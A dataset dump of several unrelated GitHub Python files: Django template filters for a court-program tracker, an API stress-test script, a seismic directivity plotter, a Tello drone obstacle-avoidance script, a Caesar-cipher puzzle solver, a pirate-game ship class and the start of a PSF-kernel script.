provider(providerid):\n if providerid == 5:\n return \"Scottsdale City Court (SCC)\"\n\n\n@register.filter(name='status')\ndef status(actualenddate, noncomp):\n if not actualenddate and not noncomp:\n return \"Active\"\n if actualenddate:\n return \"Compliant\"\n if noncomp:\n return \"Non Compliant\"\n\n@register.filter(name='programAbuse')\ndef progamAbuse(program):\n abuses = Abuses.objects.filter(programid=program.programid)\n if abuses:\n return True\n else:\n return False\n\n@register.filter(name='programMast')\ndef progamMast(program):\n masts = Masts.objects.filter(programid=program.programid)\n if masts:\n return True\n else:\n return False\n\n@register.filter(name='programPsych')\ndef progamPsych(client):\n masts = Psych.objects.filter(clientid=client.userid)\n if masts:\n return True\n else:\n return False\n\n@register.filter(name='sec2Mins')\ndef secondsToMinutes(seconds):\n minutes = seconds / 60\n minutes = '%.0f'%(minutes)\n seconds = seconds % 60\n return \"{} minutes and {} seconds\".format(minutes, seconds)\n\n@register.filter(name='check')\ndef checked(livList, index):\n if livList[index] == \"1\":\n return \"checked\"\n else:\n return \"unchecked\"\n\n@register.filter(name='sub')\ndef substance(sub, index):\n split = sub.split(',')\n return split[index]\n\n@register.filter(name='mastResult')\ndef mastResult(mastScore):\n if mastScore < 3:\n return \"Low Risk Abuser\"\n if mastScore > 2 and mastScore < 6:\n return \"Abuse/early or middle problem drinker\"\n if mastScore > 5:\n return \"Alcoholic\"\n\n@register.filter(name='checkNo')\ndef checkedNo(livList, index):\n if livList[index] == \"0\":\n return \"checked\"\n else:\n return \"unchecked\"\n\n@register.filter(name='checkYes')\ndef checkedYes(livList, index):\n if livList[index] == \"1\":\n return \"checked\"\n else:\n return \"unchecked\"", "repo_name": "tjquinn1/roth", "sub_path": "cts/templatetags/cts_extras.py", "file_name": "cts_extras.py", "file_ext": "py", "file_size_in_byte": 3510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.template.Library", "line_number": 7, "usage_type": "call"}, {"api_name": "django.template", "line_number": 7, "usage_type": "name"}, {"api_name": "models.Abusebehav.objects.filter", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Abusebehav.objects", "line_number": 68, "usage_type": "attribute"}, {"api_name": "models.Abusebehav", "line_number": 68, "usage_type": "name"}, {"api_name": "models.Mastscore.objects.filter", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Mastscore.objects", "line_number": 76, "usage_type": "attribute"}, {"api_name": "models.Mastscore", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Psych.objects.filter", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Psych.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Psych", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "28949292659", "text": "import os\nimport time\nimport datetime\nimport json\nimport traceback\nimport requests\nimport pymongo\nfrom multiprocessing import Pool\nfrom concurrent.futures import ThreadPoolExecutor\nfrom concurrent.futures import as_completed\nfrom concurrent.futures import wait\nfrom concurrent.futures import ALL_COMPLETED\n\n# 数据库操作\nclient = pymongo.MongoClient(host='localhost', port=27017)\ndb = client['stress_test']\ntask_col = db['tasks']\nresult_col = db['results']\n\n# 测试的url/header等信息\nurl_new = \"http://baidu.com/\"\nurl_result = \"http://baidu.com/\"\nheaders = {'content-type': 'text/plain; charset=utf-8'}\npayload = {'instance': {\n 'ip': '125.121.107.71',\n 'isp': '电信',\n 'country': '中国',\n 'province': '浙江',\n 'city': '杭州'\n}\n}\n\n\n# 处理json的类\nclass MyEncoder(json.JSONEncoder):\n\n def default(self, obj):\n \"\"\"\n 检查bytes类型的数据转为str类型\n \"\"\"\n if isinstance(obj, bytes):\n return str(obj, encoding='utf-8')\n return json.JSONEncoder.default(self, obj)\n\n\n# 处理任务的类\nclass TaskManager(object):\n\n def __init__(self):\n self.object_id = ''\n self.task_id = ''\n self.result_dict = {}\n\n def create_task(self):\n data = json.dumps(payload, cls=MyEncoder, indent=4)\n # data = json.dumps(payload)\n try:\n res = requests.post(url=url_new, headers=headers, data=data, timeout=10)\n if res.status_code not in [200]:\n print('request /api/v2/task/new status_code : ', res.status_code)\n return \"\"\n res_data = res.json()[\"data\"]\n add_res_data_mongodb = task_col.insert_one(res_data)\n self.object_id = add_res_data_mongodb.inserted_id\n self.task_id = res_data[\"task_id\"]\n except Exception as e:\n print(\"error : \", e)\n traceback.print_exc()\n return self.task_id\n\n @staticmethod\n def get_secondary_domain(url):\n secondary_domain = url.split(\"//\")[1].split(\".\")[0]\n return secondary_domain\n\n @staticmethod\n def get_target_cdn_str(url):\n target_cdn_str = url.split(\"|\")[0]\n return target_cdn_str\n\n @staticmethod\n def get_suffix_str(url):\n suffix_str = url.split(\"|\")[1]\n return suffix_str\n\n @staticmethod\n def get_trid_str(url):\n trid_str = url.split(\"&\")[6].split(\"=\")[1]\n return trid_str\n\n def handle_task(self):\n try:\n task = task_col.find_one({\"task_id\": self.task_id})\n except Exception as e:\n print(\"can not find task_id! --->\", e)\n return\n self.result_dict[\"task_id\"] = task[\"task_id\"]\n self.result_dict[\"create_time\"] = task[\"create_time\"]\n self.result_dict[\"completed_time\"] = str(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n self.result_dict[\"status\"] = \"Error\"\n self.result_dict[\"data_sequence\"] = \"target_cdn_str|suffix_str|trid_str\"\n data_list = []\n self.result_dict[\"data\"] = data_list\n for url_task in task[\"urls\"]:\n res_str = \"\"\n if url_task.split(\"|\")[0] == \"bvc\":\n res_str = self.get_secondary_domain(url_task) + '|' + self.get_suffix_str(\n url_task) + '|' + self.get_trid_str(url_task)\n data_list.append(res_str)\n else:\n res_str = self.get_target_cdn_str(url_task) + '|' + self.get_suffix_str(\n url_task) + '|' + self.get_trid_str(url_task)\n data_list.append(res_str)\n if self.result_dict:\n self.result_dict[\"status\"] = \"Done\"\n # result_col.insert_one(self.result_dict)\n return self.result_dict\n\n @staticmethod\n def callback_task(result_dict):\n data = json.dumps(result_dict)\n try:\n res = requests.post(url=url_result, data=data, timeout=10)\n if res.status_code not in [200, 202]:\n print('request /api/v2/result status_code : ', res.status_code)\n return \"\"\n except Exception as e:\n print(\"Callback task error! --->\", e)\n return res\n\n\n# 测试接口一的qps\ndef get_create_task_qps():\n data = json.dumps(payload, cls=MyEncoder, indent=4)\n start_tick = datetime.datetime.now()\n i = 0\n while 1:\n i = i + 1\n try:\n requests.post(url=url_new, headers=headers, data=data, timeout=10)\n except Exception as e:\n print(e)\n end_tick = datetime.datetime.now()\n if (end_tick - start_tick).seconds == 1:\n break\n return i\n\n\n# 测试接口二的qps\ndef get_callback_task_qps():\n query_args = {}\n projection_fields = {'_id': False}\n result_dict = result_col.find_one(query_args, projection=projection_fields)\n data = json.dumps(result_dict, cls=MyEncoder, indent=4)\n start_tick = datetime.datetime.now()\n i = 0\n while 1:\n i = i + 1\n try:\n requests.post(url=url_result, data=data, timeout=10)\n except Exception as e:\n print(e)\n end_tick = datetime.datetime.now()\n if (end_tick - start_tick).seconds == 1:\n break\n return i\n\n\n# 测试接口一\ndef task_create_task():\n tm = TaskManager()\n task_id = tm.create_task()\n if task_id:\n return 1\n else:\n print(\"create_task error!\")\n return -1\n\n\n# 测试接口二\ndef task_callback_task():\n query_args = {}\n projection_fields = {'_id': False}\n result_dict = result_col.find_one(query_args, projection=projection_fields)\n data = json.dumps(result_dict, cls=MyEncoder, indent=4)\n res = requests.post(url=url_result, data=data, timeout=10)\n if res.status_code in [200, 202]:\n return 1\n else:\n # print(\"callback_task error! ---> \", res.status_code)\n return -1\n\n\n# 创建一个任务\ndef task_one():\n tm = TaskManager()\n task_id = tm.create_task()\n # task_id = tm.task_id = '45eb650db78348f1ac28d6388c372ab0'\n if task_id:\n result_dict = tm.handle_task()\n if result_dict:\n print(result_dict)\n callback_res = tm.callback_task(result_dict)\n print(\"callback_res : \", callback_res)\n return 1\n else:\n print(\"handle_task error!\")\n return -1\n else:\n print(\"create_task error!\")\n return -1\n\n\n# 用进程创建多个任务\ndef build_tasks_with_process(total_num, start_num):\n start_time = datetime.datetime.now()\n m_pool = Pool(total_num)\n for i in range(start_num):\n m_pool.apply_async(task_one(), args=(i,))\n m_pool.close()\n m_pool.join()\n end_time = datetime.datetime.now()\n execution_time = end_time - start_time\n print(\"execution_time : \", execution_time)\n\n\n# 用线程创建多个任务\ndef build_tasks_with_thread(max_workers, start_num):\n success_num = 0\n start_time = datetime.datetime.now()\n executor = ThreadPoolExecutor(max_workers)\n all_task = [executor.submit(task_callback_task, ) for i in range(start_num)]\n # all_task = [executor.submit(task_create_task, ) for i in range(start_num)]\n # all_task = [executor.submit(task_one, ) for i in range(start_num)]\n for task_res in as_completed(all_task):\n if task_res.result() == 1:\n success_num = success_num + 1\n else:\n pass\n wait(all_task, return_when=ALL_COMPLETED)\n end_time = datetime.datetime.now()\n execution_time = end_time - start_time\n print(\"success_num : \", success_num)\n print(\"execution_time : \", execution_time)\n return success_num, execution_time\n\n\ndef main():\n # 连续五次测试\n # result = []\n # for i in range(5):\n # res = build_tasks_with_thread(1000, 1000)\n # time.sleep(5)\n # result.append(res)\n # print(result)\n \n # 一次测试,输出结果\n result = build_tasks_with_thread(100, 100)\n print(result)\n\n # 测试pqs\n # print(\"/api/v2/task/new ---- qps :\", get_create_task_qps())\n # print(\"/api/v2/result ---- qps :\", get_callback_task_qps())\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "ETalienwx/Stress_test", "sub_path": "publish_task.py", "file_name": "publish_task.py", "file_ext": "py", "file_size_in_byte": 8140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pymongo.MongoClient", "line_number": 15, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 35, "usage_type": "attribute"}, {"api_name": "json.JSONEncoder.default", "line_number": 43, "usage_type": "call"}, {"api_name": "json.JSONEncoder", "line_number": 43, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 58, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 68, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 99, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 121, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 123, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 135, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 143, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 154, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 155, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 155, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 160, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 163, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 185, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 186, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 216, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 216, "usage_type": "attribute"}, {"api_name": "multiprocessing.Pool", "line_number": 217, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 222, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 222, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 230, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 230, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 231, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 235, "usage_type": "call"}, {"api_name": "concurrent.futures.wait", "line_number": 240, "usage_type": "call"}, {"api_name": "concurrent.futures.ALL_COMPLETED", "line_number": 240, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 241, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 241, "usage_type": "attribute"}]} +{"seq_id": "34501498391", "text": "import argparse\nfrom pathlib import Path\n\nfrom qcore import nhm\nfrom gmhazard_calc import gm_data, directivity\nfrom gmhazard_calc.im import IM, IMType\n\n\ndef bea20_directivity_plots(\n fault_name: str, output_dir: Path, period: float = 3.0, grid_space: int = 100\n):\n \"\"\"\n Creates 6 plots to show total directivity effects for a given fault with a single hypocentre\n\n Parameters\n ----------\n fault_name: str\n Name of the fault to produce plots for\n output_dir: Path\n Path to the location of the output plot directory\n period: float, optional\n Float to indicate which period to extract from fD to get fDi\n grid_space: int, optional\n The grid spacing to use for generating directivity and to show resolution for plots\n \"\"\"\n im = IM(IMType.pSA, period=period)\n ens = gm_data.Ensemble(\"v20p5emp\")\n branch = ens.get_im_ensemble(im.im_type).branches[0]\n nhm_dict = nhm.load_nhm(branch.flt_erf_ffp)\n\n fault, site_coords, planes, lon_lat_depth, x, y = directivity.utils.load_fault_info(\n fault_name, nhm_dict, grid_space\n )\n nominal_strike, nominal_strike2 = directivity.calc_nominal_strike(\n lon_lat_depth\n )\n\n plane_index = [i for i, plane in enumerate(planes) if plane[\"shyp\"] != -999.9][0]\n\n fdi, (\n phi_red,\n predictor_functions,\n other,\n ) = directivity.directivity._compute_directivity_effect(\n lon_lat_depth,\n planes,\n plane_index,\n site_coords,\n nominal_strike,\n nominal_strike2,\n fault.mw,\n fault.rake,\n [period],\n )\n\n s2 = other[\"S2\"].reshape((100, 100))\n f_s2 = predictor_functions[\"fs2\"].reshape((100, 100))\n f_theta = predictor_functions[\"ftheta\"].reshape((100, 100))\n f_g = predictor_functions[\"fG\"].reshape((100, 100))\n f_dist = predictor_functions[\"fdist\"].reshape((100, 100))\n fdi = fdi.reshape((100, 100))\n\n directivity.validation.plots.validation_plot(\n x,\n y,\n s2,\n f_s2,\n f_theta,\n f_g,\n f_dist,\n fdi,\n lon_lat_depth,\n output_dir,\n )\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"fault\", type=str)\n parser.add_argument(\"output_dir\", type=Path)\n parser.add_argument(\"--period\", type=float, default=3.0)\n parser.add_argument(\"--grid_space\", type=int, default=100)\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n bea20_directivity_plots(args.fault, args.output_dir, args.period, args.grid_space)\n", "repo_name": "ucgmsim/gmhazard", "sub_path": "calculation/gmhazard_calc/gmhazard_calc/directivity/validation/bea20_validation_plot.py", "file_name": "bea20_validation_plot.py", "file_ext": "py", "file_size_in_byte": 2577, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pathlib.Path", "line_number": 10, "usage_type": "name"}, {"api_name": "gmhazard_calc.im.IM", "line_number": 26, "usage_type": "call"}, {"api_name": "gmhazard_calc.im.IMType.pSA", "line_number": 26, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.im.IMType", "line_number": 26, "usage_type": "name"}, {"api_name": "gmhazard_calc.gm_data.Ensemble", "line_number": 27, "usage_type": "call"}, {"api_name": "gmhazard_calc.gm_data", "line_number": 27, "usage_type": "name"}, {"api_name": "qcore.nhm.load_nhm", "line_number": 29, "usage_type": "call"}, {"api_name": "qcore.nhm", "line_number": 29, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.utils.load_fault_info", "line_number": 31, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 31, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.calc_nominal_strike", "line_number": 34, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity", "line_number": 34, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.directivity._compute_directivity_effect", "line_number": 44, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.directivity", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 44, "usage_type": "name"}, {"api_name": "gmhazard_calc.directivity.validation.plots.validation_plot", "line_number": 63, "usage_type": "call"}, {"api_name": "gmhazard_calc.directivity.validation", "line_number": 63, "usage_type": "attribute"}, {"api_name": "gmhazard_calc.directivity", "line_number": 63, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 78, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "25160798998", "text": "from time import sleep\nimport cv2\nimport numpy as np\nimport os\nimport socket\nimport threading\nimport queue\n \nq = queue.LifoQueue()\n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ntello_address = ('192.168.10.1', 8889)\nsock.bind(('0.0.0.0', 9000))\nprint(\"Connected\")\n \n \ntestmode = 1 # 1 or 2 for testing features\nStepSize = 5\npreviousDirection = \"\"\nmsg = ''\n \n \nprint(\"Command\")\nmsg = \"command\"\nmsg = msg.encode()\nsent = sock.sendto(msg, tello_address)\nsleep(2)\n \nprint(\"Streamon\")\nmsg = \"streamon\"\nmsg = msg.encode()\nsent = sock.sendto(msg, tello_address)\nsleep(2)\n \n \ntry:\n if not os.path.exists('data'):\n os.makedirs('data')\nexcept OSError:\n print ('Error: Creating directory of data')\n \nif testmode == 1:\n F = open(\"./data/imagedetails.txt\",'a')\n F.write(\"\\n\\nNew Test \\n\")\n \n \ndef forward():\n msg = \"forward 50\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print(\"Going forward\")\n sleep(3)\n \ndef right():\n msg = \"cw 90\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print (\"Going right\")\n sleep(3)\n \ndef left(): \n msg = \"ccw 90\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print (\"Going left\")\n sleep(3)\n \n# Not currently used\ndef backward(): \n msg = \"backward 50\"\n msg = msg.encode()\n print (\"Going backwards\")\n sent = sock.sendto(msg, tello_address)\n sleep(3) \n \ndef land():\n msg = \"land\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n print(\"Landing\")\n \n \ndef getChunks(l, n):\n a = []\n \n for i in range(0, len(l), n): \n \n a.append(l[i:i + n])\n \n return a\n \n \ndef Receive():\n currentFrame = 0\n didTakeoff = False\n \n while True:\n \n if didTakeoff == False:\n \n print(\"takeoff\")\n msg = \"takeoff\"\n msg = msg.encode()\n sent = sock.sendto(msg, tello_address)\n sleep(5)\n \n # Uncomment to have the drone start higher up\n # print(\"up\")\n # msg = \"up 75\"\n # msg = msg.encode()\n # sent = sock.sendto(msg, tello_address)\n # sleep(5)\n \n didTakeoff = True\n \n name = './data/frame' + str(currentFrame) + '.jpg'\n print ('Creating...' + name)\n \n frame = q.get()\n img = frame.copy()\n \n blur = cv2.bilateralFilter(img,9,40,40) \n edges = cv2.Canny(blur,50,100) \n \n img_h = img.shape[0] - 1 \n img_w = img.shape[1] - 1 \n \n EdgeArray = []\n \n for j in range(0,img_w,StepSize): \n \n pixel = (j,0)\n \n for i in range(img_h-5,0,-1):\n \n if edges.item(i,j) == 255:\n \n pixel = (j,i) \n break \n \n EdgeArray.append(pixel) \n \n \n for x in range(len(EdgeArray)-1):\n \n cv2.line(img, EdgeArray[x], EdgeArray[x+1], (0,255,0), 1)\n \n \n for x in range(len(EdgeArray)):\n \n cv2.line(img, (x*StepSize, img_h), EdgeArray[x], (0,255,0), 1)\n \n \n chunks = getChunks(EdgeArray,int(len(EdgeArray)/3))\n \n c = []\n \n for i in range(len(chunks)-1): \n \n x_vals = []\n y_vals = []\n \n for (x,y) in chunks[i]:\n \n x_vals.append(x)\n y_vals.append(y)\n \n \n avg_x = int(np.average(x_vals))\n avg_y = int(np.average(y_vals))\n \n c.append([avg_y,avg_x]) \n \n cv2.line(frame, (480,720), (avg_x,avg_y), (255,0,0), 2)\n \n #print(\"C: \", c)\n forwardEdge = c[1]\n print(\"Forward Edge[0]: \", forwardEdge[0])\n \n cv2.line(frame, (480,720), (forwardEdge[1], forwardEdge[0]), (0,255,0), 3)\n cv2.imwrite(name, frame)\n \n y = (min(c))\n #print(\"y[1]: \", y[1])\n \n if forwardEdge[0] > 550: # Can change num to make the drone react closer or farther from object\n \n if y[1] < 310:\n \n if previousDirection == \"right\": \n right()\n direction = \"right\"\n \n else:\n left()\n direction = \"left\"\n \n else: \n \n if previousDirection == \"left\": \n left()\n direction = \"left\"\n \n else: \n right()\n direction = \"right\"\n \n else:\n forward()\n direction = \"forward\"\n \n previousDirection = direction\n \n if testmode == 1:\n F.write (\"frame\" + str(currentFrame)+ \".jpg\" + \" | \" + str(c[0]) + \" | \" + str(c[1]) + \" | \" + direction + \"\\n\") \n currentFrame += 1\n \n if testmode == 2:\n cv2.imshow(\"frame\",frame)\n cv2.imshow(\"Canny\",edges)\n cv2.imshow(\"result\",img)\n \n \nif __name__ == '__main__':\n \n p1 = threading.Thread(target=Receive)\n p1.start()\n \n cap = cv2.VideoCapture(\"udp://@0.0.0.0:11111?overrun_nonfatal=1&fifo_size=50000000\")\n while True:\n try:\n ret, frame = cap.read()\n if ret:\n q.put(frame)\n cv2.imshow('Tello', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n land()\n os._exit(1)\n except Exception as err:\n print(err)\n \n cap.release()\n cv2.destroyAllWindows()", "repo_name": "Steven308/TelloCollisionAvoidance", "sub_path": "TelloCA.py", "file_name": "TelloCA.py", "file_ext": "py", "file_size_in_byte": 5427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "queue.LifoQueue", "line_number": 9, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 38, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 66, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 105, "usage_type": "call"}, {"api_name": "cv2.bilateralFilter", "line_number": 122, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 219, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 220, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 221, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 226, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 229, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 235, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 236, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 238, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 243, "usage_type": "call"}]} +{"seq_id": "27750219782", "text": "import requests\n\n# get a readme from https://github.com/pymarcus/daemonium\n\n\ndef get_readme():\n url = 'https://raw.githubusercontent.com/pymarcus/daemonium/master/README.md'\n response = requests.get(url)\n return response.text\n\n\ndef get_last_line(readme):\n lines = readme.split('\\n')\n return lines[-4].replace('
', '').replace('
', '').strip()\n\n\ndef decrypt_cesar(cypher, shift):\n alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n decrypted = ''\n for char in cypher:\n if char in alphabet:\n decrypted += alphabet[(alphabet.index(char) +\n shift) % len(alphabet)]\n else:\n decrypted += char\n return decrypted\n\n\nif __name__ == '__main__':\n readme = get_readme()\n last_line = get_last_line(readme)\n print(last_line)\n for i in range(0, 26):\n print(decrypt_cesar(last_line, i))\n", "repo_name": "JuanIWK3/security", "sub_path": "security/daemonium/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 900, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "25485398552", "text": "import json\n\n\nclass Ship:\n \"\"\"defines a single instance of a ship\"\"\"\n def __init__(self, user):\n self.captain = user\n self.ship_name = user + \"\\'s ship\"\n self.cannons = 1\n self.crew = 1\n self.armor = 1\n self.sails = 1\n self.hull = 110\n\n self.gold = 0\n\n self.position = 0\n self.win = 0\n self.loss = 0\n self.x = 0\n self.y = 0\n\n #self.parts_amt = [self.cannons, self.crew, self.armor, self.sails]\n def info(self):\n \"\"\"returns a str with basic parameters of the ship\"\"\"\n\n infostr = '\\n'.join([str(self.cannons), str(self.crew), str(self.armor), str(self.sails)])\n \"\"\"\n infostr = \"This level {6} ship is captained by {4} \\nIt has {0} cannons, {1} crew, {2} armor, and {3} sails \\n\"\\\n \"Its coffers are holding {5} gold\".\\\n format(self.cannons, self.crew, self.armor, self.sails, self.captain, self.gold, self.level())\n \"\"\"\n return infostr\n\n def level(self):\n \"\"\"returns level of ship based on its primary features\"\"\"\n ship_level = int((self.cannons + self.crew + self.armor + self.sails) / 1) - 3\n return int(ship_level)\n\n def upgrade(self, parameter, amount, cost=0):\n \"\"\"updates the parameters of the ship and subtracts the cost\"\"\"\n if parameter == \"cannons\":\n self.cannons += amount\n elif parameter == \"crew\":\n self.crew += amount\n elif parameter == \"armor\":\n self.armor += amount\n elif parameter == \"sails\":\n self.sails += amount\n else:\n return False\n\n self.gold -= cost\n\n self.update()\n return True\n\n def upgrade_costs(self):\n info = []\n for part in [self.cannons, self.crew, self.armor, self.sails]:\n info.append(str(int(100 + float((part**1.2) * 20))))\n infostr = '\\n'.join(info)\n return infostr\n\n def repair_hull(self):\n self.hull = 100 + self.armor * 5 + self.sails * 5\n\n def damage_hull(self, damage):\n self.hull -= damage\n\n def to_dict(self):\n \"\"\"creates a dict from ship params\"\"\"\n return {\n 'captain': self.captain,\n 'ship_name': self.ship_name,\n 'cannons': self.cannons,\n 'crew': self.crew,\n 'armor': self.armor,\n 'sails': self.sails,\n 'gold': self.gold,\n 'win': self.win,\n 'loss': self.loss,\n 'x': self.x,\n 'y': self.y\n }\n\n def from_dict(self, json_data=None):\n \"\"\"creates a ship based on a dict\"\"\"\n if json_data is None:\n return None\n\n self.captain = json_data['captain']\n self.ship_name = json_data['ship_name']\n self.cannons = json_data['cannons']\n self.crew = json_data['crew']\n self.armor = json_data['armor']\n self.sails = json_data['sails']\n self.gold = json_data['gold']\n self.win = json_data['win']\n self.loss = json_data['loss']\n self.x = json_data['x']\n self.y = json_data['y']\n\n # should this be here?\n self.position = json_data['position']\n\n def update(self, is_new=False):\n if is_new:\n ships.append(self.to_dict())\n else:\n ships[self.position] = self.to_dict()\n Ship.write_json_file()\n\n @staticmethod\n def write_json_file():\n with open(\"ship_file.json\", \"w\") as write_file:\n json.dump(ships, write_file)\n\n @staticmethod\n def find_ship(captain):\n \"\"\"returns the ship based on captain from ships variable\"\"\"\n index = 0\n for s in ships:\n if s['captain'] == captain:\n s['position'] = index\n temp_ship = Ship(captain)\n temp_ship.from_dict(s)\n return temp_ship\n index += 1\n return None\n\n @staticmethod\n def calc_upgrade(part, amount=1):\n return sum([int(100 + float(((part + temp_amount) ** 1.2) * 20)) for temp_amount in range(amount, 0, -1)])\n\n\"\"\"reading the ship file to add all the users ships to the dataspace\"\"\"\nwith open(\"ship_file.json\", \"r\") as read_file:\n first = read_file.read(1)\n global ships\n ships = []\n if first:\n read_file.seek(0)\n json_data = json.load(read_file)\n for s in json_data:\n ships.append(s)\n", "repo_name": "bdavs/Piratebot", "sub_path": "Ship.py", "file_name": "Ship.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dump", "line_number": 117, "usage_type": "call"}, {"api_name": "json.load", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "18817265207", "text": "import photutils\nfrom photutils import create_matching_kernel\nfrom astropy.io import fits\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport scipy\nfrom photutils import TopHatWindow\nfrom photutils import CosineBellWindow\n\nwindow = CosineBellWindow(alpha=0.35)\nfrom scipy.signal import convolve as scipy_convolve\nwindow = TopHatWindow(0.35)\n\ndir1 = '/home/sourabh/ULIRG_package/data/OPTICAL_PSF/'\ndata_ref = fits.getdata(dir1 + 'f165psf.fits')\ndata_psf = fits.getdata(dir1 + 'PSF_775_gal4_rotate_cut.fits')\nkernel = create_matching_kernel(data_psf, data_ref) # , window = window )\nfits.writeto('ker.fits', data=kernel, overwrite=True)\nplt.imshow(kernel, cmap='Greys_r', origin='lower')\nfilename = 